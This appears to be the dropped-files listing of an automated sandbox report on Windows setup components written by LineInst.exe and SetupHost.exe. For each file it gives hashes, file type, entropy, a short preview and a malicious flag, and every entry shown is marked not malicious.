                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.0397151326188603
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:53gbEPnmPZkPSsPMPSuiPSfiPSsiPSDPS6PSoPSp4PSl4PSk4PSFxPW:53IcsDv8I7CPs
                                                                                                                      MD5:65CBE3A3C9F4FDDA30F14207DABBE4AB
                                                                                                                      SHA1:AF98FBF840A02BFB362133BD897CF33E8E20FA4A
                                                                                                                      SHA-256:3F78A56586E5CEF0FCC78ACA56840CE9212305FC5E69C6BB8A6247D6EDA3909C
                                                                                                                      SHA-512:E1A9136AEAC4087D0F49814ECE575349CD8D630C1989E3E6ABD094A183ABC9DBA94FA8747EC6FD78AF9F008707CBE715411F0EC7B7D2E3AE7B6537945848B28F
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                                                                      C:\$Windows.~WS\Sources\Panther\setupact.log

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):3.271359157886994
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xEHaHsH5HbH+HtHkHHHuHj0Hg3n1Iv3D5yzYfkueJ4taM40L45c+Bs+2qEJ/22jk:DFv6DiF0OB5n//uGAqh6PWqyfbL
                                                                                                                      MD5:2C6E01D357C17C5A8D5CDB5CE8BDBC2E
                                                                                                                      SHA1:721430F29ECC56B790FDAAD366F4882A3167C4B9
                                                                                                                      SHA-256:815F84D798E015D5AC8F245009FB0A0B859B085A2F4B00815952477B194E3D28
                                                                                                                      SHA-512:692778C56B424F4338C918BE396EC250F36447FA1538B981109DF74191FC532C4730EC5FC7D75CFB0125353690E1BD43D42EC5E486FBFAD9C07C1D45F27B275B
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:08, Info MOUPG *************** SetupHost Logging Begin ***************..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: ModulePath = [C:\$Windows.~WS\Sources]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: WorkingPath = [C:\$Windows.~WS\Sources]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: LoggingPath = [C:\$Windows.~WS\Sources\Panther]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: MediaPath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: InstallFilePath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: ActionListFilePath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: CmdLine = [/Download /Web ]..2024-12-29

                                                                                                                      C:\$Windows.~WS\Sources\Panther\setuperr.log

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (304), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):689
                                                                                                                      Entropy (8bit):5.3565252498748235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:EEcOvojERGu6aXth+IjiGKA2BWWBXRtFGaERGu6aXTE/g/eeDMcaHc2JxRnpf5r1:EEc+ojEMu/EA4REMuH2g/eeYcOrjp
                                                                                                                      MD5:63C270AABD0EF7161F6A499777F72E43
                                                                                                                      SHA1:8CDF227D415EC83FC01AD565C1E8C98C15EE075C
                                                                                                                      SHA-256:ED6AC99A88A3F809D52BD08221DAA4DA7BB1C4476760B7F1C54CB91B07213BDB
                                                                                                                      SHA-512:D2775457DB7DFD9E8CACA6DB340801DA72222EF83223CDAE812F3B4F4CBB4C618779BEB386FCF9F11B762093344D0042592AEF130B2F16B7A8AFED64FC0437D2
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:09, Error MOUPG CInstallUI::GetDefaultLanguage(2027): Result = 0x80070002[gle=0x00000002]..2024-12-29 07:41:25, Error MOUPG Bits Error: Fatal = [Yes], State = [TransientError], Error_Context = [BG_ERROR_CONTEXT_REMOTE_FILE], hr = [0x80072EE7], Description = [The server name or address could not be resolved..] [gle=0x000036b7]..2024-12-29 07:41:25, Error MOUPG Bits Error: File [http://dl.delivery.mp.microsoft.com/filestreamingservice/files/c8ba26f0-72f8-44df-80df-cfad71e9abeb/19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCONSUMER_RET_x64FRE_en-gb.esd] => [C:\ESD\Download\installx64.esd][gle=0x000036b7]..

                                                                                                                      C:\$Windows.~WS\Sources\Panther\windlp.state-old.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.9948677314094648
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SFXW+dQuBugcuC2na5TaTUd90PzY+anYA7K:SFXW+dQuBugcuC79xd0ZAW
                                                                                                                      MD5:DFDA42DDC910218BDCD8246B566929A2
                                                                                                                      SHA1:A3396C49A37FEFC5EAD260E5CA8516F5720B846A
                                                                                                                      SHA-256:71E4CCBE210E774BC3B1AD0B74F7C30717582C5B08A088E7A1A6B2D2FF329B07
                                                                                                                      SHA-512:99B8A3829C1E055351C984A7F695D10F03BAA2EA38132C339E9A8F8AA5FDB6ECF25CC07926636DACF52444E2824EE837C75D933A568E744BD7237466E9B3DD29
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.2.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.7.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.0.9.7.c.7.7.f.b.-.5.d.5.d.-.4.8.6.8.-.8.6.0.b.-.0.9.f.4.e.5.b.5.0.a.5.3.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.H.o.s.t.O.S.B.r.a.n.c.h.N.a.m.e.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.v.b._.r.e.l.e.a.s.e.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.e.b.S.e.t.u.p.O.n.l.i.n.e.S.t.o.r.e.V.e.r.s.i.o.n.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1...4...1.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.

                                                                                                                      C:\$Windows.~WS\Sources\Panther\windlp.state.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.9948677314094648
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SFXW+dQuBugcuC2na5TaTUd90PzY+anYA7K:SFXW+dQuBugcuC79xd0ZAW
                                                                                                                      MD5:DFDA42DDC910218BDCD8246B566929A2
                                                                                                                      SHA1:A3396C49A37FEFC5EAD260E5CA8516F5720B846A
                                                                                                                      SHA-256:71E4CCBE210E774BC3B1AD0B74F7C30717582C5B08A088E7A1A6B2D2FF329B07
                                                                                                                      SHA-512:99B8A3829C1E055351C984A7F695D10F03BAA2EA38132C339E9A8F8AA5FDB6ECF25CC07926636DACF52444E2824EE837C75D933A568E744BD7237466E9B3DD29
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.W.I.N.D.L.P.>..... . .<.S.t.a.t.e.>.0.<./.S.t.a.t.e.>..... . .<.T.a.s.k.C.o.u.n.t.>.2.<./.T.a.s.k.C.o.u.n.t.>..... . .<.W.o.r.k.i.n.g.P.a.t.h.>.C.:.\.$.W.i.n.d.o.w.s...~.W.S.\.S.o.u.r.c.e.s.\.P.a.n.t.h.e.r.<./.W.o.r.k.i.n.g.P.a.t.h.>..... . .<.S.t.r.i.n.g.C.o.u.n.t.>.7.<./.S.t.r.i.n.g.C.o.u.n.t.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.u.I.d.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.0.9.7.c.7.7.f.b.-.5.d.5.d.-.4.8.6.8.-.8.6.0.b.-.0.9.f.4.e.5.b.5.0.a.5.3.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.H.o.s.t.O.S.B.r.a.n.c.h.N.a.m.e.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.v.b._.r.e.l.e.a.s.e.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . .<.S.t.r.i.n.g.P.r.o.p.e.r.t.y.>..... . . . .<.N.a.m.e.>.T.e.l.#.A.s.m.v.\.W.e.b.S.e.t.u.p.O.n.l.i.n.e.S.t.o.r.e.V.e.r.s.i.o.n.<./.N.a.m.e.>..... . . . .<.V.a.l.u.e.>.1...4...1.<./.V.a.l.u.e.>..... . .<./.S.t.r.i.n.g.

                                                                                                                      C:\$Windows.~WS\Sources\SetupCore.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2172728
                                                                                                                      Entropy (8bit):5.943926965774228
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:OeEbcHPcrJLItSNvtuu/YhSef7K/cjkXgaoo0NGG2Adj9DDIE/RYw:OVb2cRwyY4VXXEL2GjBIQYw
                                                                                                                      MD5:55A4344E76136460BE2C8547C38567B4
                                                                                                                      SHA1:83400B9A3BC4F1D935258A80B3E7636BAAA618CB
                                                                                                                      SHA-256:A9AC64EC515D04589DFC38B25D68D01F281BBB794D0DF9EC4205FE473703AEF5
                                                                                                                      SHA-512:A8AD61CAF69891EE31C48401EC87D3BB92DB5E64C9FE878EE33E072FD6E5406DB9A747485D1CF93F615072E6C565C36715700571DCD974C6EB7A76A7630D0F43
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.S.x.=.x.=.x.=.l.>.s.=.l.9.i.=.x.<.;.=.l.<.[.=.l.8.q.=.l.=.y.=.l.4.m.=.l...y.=.l.?.y.=.Richx.=.........................PE..L....7t\...........-.........R...............................................@!......o!...@A...........................R....6..h....p..X.............!.8!...@ .d.......T...................|..........@............0...............................text...B........................... ..`.data....e.......V..................@....idata...0...0...2..................@..@.rsrc........p.......<..............@..@.reloc..d....@ ....... .............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\SetupHost.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):699192
                                                                                                                      Entropy (8bit):6.488335450528499
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aoBJUei8NJTRJUrJJMOy2pWShbJAnpRj5pcRpGbov5IUfiHrCOTmfVjRagSPD:jBJUj8NJTRJUVJN59VjwbPD
                                                                                                                      MD5:A5D94F9587F97E9C674447447721B77F
                                                                                                                      SHA1:1C130F95C82AB28A4A11A7ED41EB9EA9F613A339
                                                                                                                      SHA-256:F33E7BCE0CA712BAAC95557823096F929F78927E521C0448ED237F429141EFD9
                                                                                                                      SHA-512:E5E35480A489B0F63A2938A1C4EA19ACA197A16020BB330662B62E98759FB5F7B6056416DC1D8894E433607C5B4FB3E7AE61F0D2FA3C7455DD000916EC3D5D62
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bn.............h.......h.......h.......h..........{....h..)....h.......h......Rich............................PE..L.....\e................. ..........P........0....@.................................<.....@...... .......................... v..,.......H...............8!...p..|e.. ...T....................2.......1..@............p...............................text............ .................. ..`.data....?...0.......$..............@....idata...)...p...*...2..............@..@.rsrc...H............\..............@..@.reloc..|e...p...f...$..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\SetupMgr.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):747320
                                                                                                                      Entropy (8bit):6.582241479326702
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:yMv8NZ0L0YEgAt2dBVtnliFAAF02WPy6e5W7JrAa3vpz/VXGGT3m/YvZ0YPej/O8:yMv6q0YEgAt2RtnliFAW0jPG5wXJSDjf
                                                                                                                      MD5:59D1A173F6B27A8A1CC367CA9FF6E560
                                                                                                                      SHA1:15B2C60011D97B99C4CD2EEDB62CCAB14D748DF6
                                                                                                                      SHA-256:45C2EE2387026A50F0C6B9C9119F39B6D2B6505312DBDF352399FD41E8DEB78F
                                                                                                                      SHA-512:A14D89FCF4964F7929936A16C0EF9D4896D14913B3E5BC050CD7044A1A0DA50E58520DE80A7966832F514365D031012D0E1829CD7B93D1B547812F8ABBCF7557
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M6..,X\.,X\.,X\.D[].,X\.G[].,X\.G\].,X\.,Y\*-X\.GY].,X\.G]].,X\.GX].,X\.GQ].,X\.G.\.,X\.GZ].,X\Rich.,X\........................PE..L....B.............-................@+...............................................{....@A............................Q.......@....0...............F..8!...@...f......T...............................@............................................text.............................. ..`.data...(P..........................@....idata..x........ ..................@..@.rsrc........0......................@..@.reloc...f...@...h..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\WinDlp.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1165624
                                                                                                                      Entropy (8bit):6.458049440050692
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:sHChbi7VH3Cg3G49W4qjbuK5nwTShiPGm/ap:Bhbi7VHSCGF7wTDOzp
                                                                                                                      MD5:6F12BA2D5CB564F73D9813D105E5C1FE
                                                                                                                      SHA1:B634E34149F99F4336EFC0C5DE5E850C61BE48E1
                                                                                                                      SHA-256:26B66B81267DFDA7A78890F20A4ED0D104DB1CD350D2D9F649FDB496B6C11333
                                                                                                                      SHA-512:4462F38B0A4ECA1D09EB747853CC15C804E2E42E91812604A0AEF25DE06D5FA5A5A4D79731AEB462F61ED46D63DD904D0A943919AABD5ADB771F94C63E6A175A
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mu..)...)...)...r|..(...=...-...=...&...=...#...).......=...6...=...(...=.......=...(...=...(...Rich)...........................PE..L..................-................................................................8.....@A...........................}...h...,.......LC..............8!...@..H... ...T............................8..@...............d............................text...M........................... ..`.data...............................@....idata...+.......,..................@..@.rsrc....P.......D..................@..@.reloc..H....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\pidgenx.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):888632
                                                                                                                      Entropy (8bit):6.878236449249567
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:snR+vEwcJsaaiaYZC1vLDQf8vdJy+X1LQpOd+:4zw7aaiaYZCj5vdJy+XhUOd+
                                                                                                                      MD5:A54F45A9013251F0DDD91C6B3AB18449
                                                                                                                      SHA1:D2AF46EEDBF3E5024F54D81CD062F8AA4C9B77D8
                                                                                                                      SHA-256:40A97484CE8E06658EA02AF3E3B0077C47BA8D71C2D991EB69B94F221C78478F
                                                                                                                      SHA-512:02C4784F02537247134EA17B508CBD3E5B0C6CEA943EF0143EC9708652C85C255E115A603EB337E515AB00FE6526CD5D83D560D987FFE7D1BA612A6F125AD62D
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.g.&.4.&.4.&.4.N.5.&.4.M.5.&.4.&.4.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.5.&.4.M.4.&.4.M.5.&.4Rich.&.4................PE..L...w..............!................P...........................CS P.....................@A........................p...s.......x....................n..8!... ..hy......T....................5......`4..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc..hy... ...z..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\pkeyconfig.xrm-ms

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):582696
                                                                                                                      Entropy (8bit):5.715631293469523
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:GeUJmDlHwVeCx2qTMTTnaP/d5/NbyBNiX4OOqd:GfARHwVeCx2qTMTTnaP/d5/NfJ
                                                                                                                      MD5:7D72243366184B4048A90AF77D63F21C
                                                                                                                      SHA1:4D1A0CB9CC75B1AC7DBEC285DA7B90FBC85B3892
                                                                                                                      SHA-256:A3471EB8DC2C3045E33EB48ABAEF4046EEEBBE30161A52F7056F68E479400823
                                                                                                                      SHA-512:A223ABBD4C3D3CDC6C1FE345E68613E0225B583D7C8705A89B3A9F91DEC96EC20428066830147642816B6B6628C7DEF368E89CC91D2378AA001CAB9E3BEE71F3
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><rg:licenseGroup xmlns:rg="urn:mpeg:mpeg21:2003:01-REL-R-NS"><r:license xmlns:r="urn:mpeg:mpeg21:2003:01-REL-R-NS" licenseId="{06a4dd30-84b7-4fd2-b859-f1eddb0858f5}" xmlns:sx="urn:mpeg:mpeg21:2003:01-REL-SX-NS" xmlns:mx="urn:mpeg:mpeg21:2003:01-REL-MX-NS" xmlns:sl="http://www.microsoft.com/DRM/XrML2/SL/v2" xmlns:tm="http://www.microsoft.com/DRM/XrML2/TM/v2"><r:title>XrML 2.1 License - Product Key Configuration</r:title><r:issuer><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.microsoft.com/xrml/lwc14n"/><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference><Transforms><Transform Algorithm="urn:mpeg:mpeg21:2003:01-REL-R-NS:licenseTransform"/><Transform Algorithm="http://www.microsoft.com/xrml/lwc14n"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>AM88tJM/7qpuE9kzeYjkyRVvHkQ=</DigestValue></Reference></SignedI

                                                                                                                      C:\$Windows.~WS\Sources\products.cab

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 44045 bytes, 1 file, at 0x2c +A "products.xml", ID 33800, number 1, 86 datablocks, 0x1503 compression
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):44045
                                                                                                                      Entropy (8bit):7.952743576629471
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:a7WxoIAiafX3+okXkCCn22+ZvEcKdH+u0eZfQEj7Mq6TFSguODDOLANYo:a6yIAVfX3EYn22+9vKow7MtFLu1LAN1
                                                                                                                      MD5:52B7D0637974ED697DD8AA819ED3C8B0
                                                                                                                      SHA1:E81A7094362964E9AE69580B91A1E72207BE667D
                                                                                                                      SHA-256:7677DD6247C5768737B643911894374939AAC5AE2DEA158C272511FDD2AC52BF
                                                                                                                      SHA-512:173A5893612A789F51EE9D914AE26E1FAEC557DCFAB4DDB8AA8C8BAA7690CA456AF117E14E2B6D004C963573CB67A02F0E2760CC8C609287587DC335F9C4C1A8
                                                                                                                      Malicious:false
                                                                                                                      Preview:MSCF............,...................I...V...).*........W. .products.xml..]......[......R3.F4U...oP. i/..A.o9..Q..V\..v..."......9.\.vw..r...1...jqC.!.....B..FQl.....x2...Bl........@<48.G.....-2.{...;.'z.u.......XJ"c.f..M.u..[..un..Y.......$.n]s.....d.=... 2.jpT.vLr.....U..'.h....=.A......-......"...l.N.......b...5.. ..9....@.j..w...}.Z.CAjd.uN...r..^.H}...{...l.d:.$...5s..7m.*......K..N..$..0...Y..r..a.3s.$. .H..J..?.c...w.....t.c.S.....a....&}7>._<...W....e...x?..e.k......o..}^:......c....O..7...........*s..u?.<Q}.>.s..S.....j..{......+.x.I...{........}....|.m.......L\..o.......|....N..=.<..O4...w}..yS.,.~..z.o.<.O.....w>..........K.....jr......>6.G.S.?\....x.............b........G#...g.....<.....!....,.k.9..._.\......I..M...d?~0R....%O.RK....../s?...}.<.o.=..}....<|.?..'.5.g.|.[2...O|...#/..~..........Cx.U.N.c...x..)..mj...<......\>.......?....................?{..........;..........#...[?............~a...?.x..5.c....,.Iy...K.2....

                                                                                                                      C:\$Windows.~WS\Sources\products.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2794793
                                                                                                                      Entropy (8bit):5.169002964366024
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:iqm6xDGaol3wdAZNRlKUp9Lq0T/vjXrOo/TpuIexzfDS8/jRCMRNoUosgFTkYKl1:dzfDS8/jRCMRNxyrcL/cGPjOAEg
                                                                                                                      MD5:F9C1DF5C8718468B892AF250F6D7B78E
                                                                                                                      SHA1:040DA263BC223436F929DBC1F2AB88198E299610
                                                                                                                      SHA-256:76FCC8EEACB7DA966441A7E0AC8B79CC095F13682ABB92EE5A614C52F72CE54C
                                                                                                                      SHA-512:EDEB708E50F815EF022BD9275255DD3644B07597E9A90736364FBB7206B77BA44953D61735DEF7E2653A12442FD623BAFF0630793B507ECCF4508E772BA02A39
                                                                                                                      Malicious:false
                                                                                                                      Preview:<MCT>.. <Catalogs>.. <Catalog version="1.4.1">.. <PublishedMedia id="" release="">.. <Files>.. <File id="">.. <FileName>19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FileName>.. <LanguageCode>zh-cn</LanguageCode>.. <Language>Chinese (Simplified, China)</Language>.. <Edition>CoreCountrySpecific</Edition>.. <Architecture>x64</Architecture>.. <Size>3945834799</Size>.. <Sha1>8b49a8943cb3260ce9a8dadcd729f0ac98018245</Sha1>.. <FilePath>http://dl.delivery.mp.microsoft.com/filestreamingservice/files/6048ac73-c010-4eaf-ac07-a8672588662e/19045.3803.231204-0204.22h2_release_svc_refresh_CLIENTCHINA_RET_x64FRE_zh-cn.esd</FilePath>.. <Key />.. <Architecture_Loc>%ARCH_64%</Architecture_Loc>.. <Edition_Loc>%BASE_CHINA%</Edition_Loc>.. <IsRetailOnly>False</IsRetailOnly>.. </File>.. <File id="">.

                                                                                                                      C:\$Windows.~WS\Sources\setupplatform.cfg

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10452
                                                                                                                      Entropy (8bit):5.444136787913199
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:seqadKxSRlb3dY/e7sxzs7c6i19WO7hD26BV+btnQfz/:sjmTrq/e7s1vpMvoz/
                                                                                                                      MD5:033E7ADC314C248CC29A9F14906C21E5
                                                                                                                      SHA1:6B31F8A23514B4E98217CD05BE08E7967ECA7048
                                                                                                                      SHA-256:C40FDDBB16853406D12D30E01E170DE8474728BB8EC24794DB721DE0A7F67927
                                                                                                                      SHA-512:46B46D548F5A2269E886A9F6873D97549EEB92C7294114C62BAF7805AC423E4D3AA3A50CD7B3294BE03E22C271F6BEF1134ADF797D9F838962EF5B42E8ECD19E
                                                                                                                      Malicious:false
                                                                                                                      Preview:;..; This section describes the footprint dependencies..; of various platform sections..;..[Dependencies]..Basic =..Servicing = Basic..ICB = Basic, Servicing..Migration = Basic....;..; Each element in a footprint section can be one of three things:..; - File name: this must not ending in '\'...; - Folder name: this must end in '\'...; - File pattern pattern: these can contain wild cards...; These pattern should be one of the format..; accepted by FindFirstFile()...;......[Footprint.Basic]..diager.dll..diagtrack.dll..diagtrackrunner.exe..reagent.admx..reagent.dll..reagent.xml..setupplatform.cfg..setupplatform.dll..setupplatform.exe..unbcl.dll..wdsclientapi.dll..wdscore.dll..wdscsl.dll..wdsimage.dll..wdstptc.dll..wdsutil.dll..WinSetupBoot.sys..WinSetupBoot.hiv....[Footprint.Basic.Delayed]..*-*\reagent.adml..*-*\reagent.dll.mui..*-*\setupplatform.exe.mui..*-*\wdsimage.dll.mui..du.dll..ReserveManager.dll......[Footprint.Servicing]..dismapi.dll..dismcore.dll..dismcoreps.dll..dis

                                                                                                                      C:\$Windows.~WS\Sources\setupplatform.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7203144
                                                                                                                      Entropy (8bit):6.701114300776759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FsA91crphY6bcvsNZSI/mbuhfuCK4Q4Rus1T+nfIqBpxlpcLy/Wuac7KA2:iA98pSg3ZHLusB+nF1/dS
                                                                                                                      MD5:0DB2EB7B159D7289DFBDF3CA29D44704
                                                                                                                      SHA1:57A9AA7409A9040A701855BF610F68E5A9CFEA24
                                                                                                                      SHA-256:CBEEC25C578F4E8EAE81BB8829C3B7BC81648DA6F63EEB4A606B9A66660D6D91
                                                                                                                      SHA-512:8EADA149F0C90DF794D26EFE8AF2C90DF1B8172B33CCC6639F3F1A18671AA34493A6D466B4BF2357075094BC13129E5001623B2388C39ED6FA4239B4E9EF6328
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
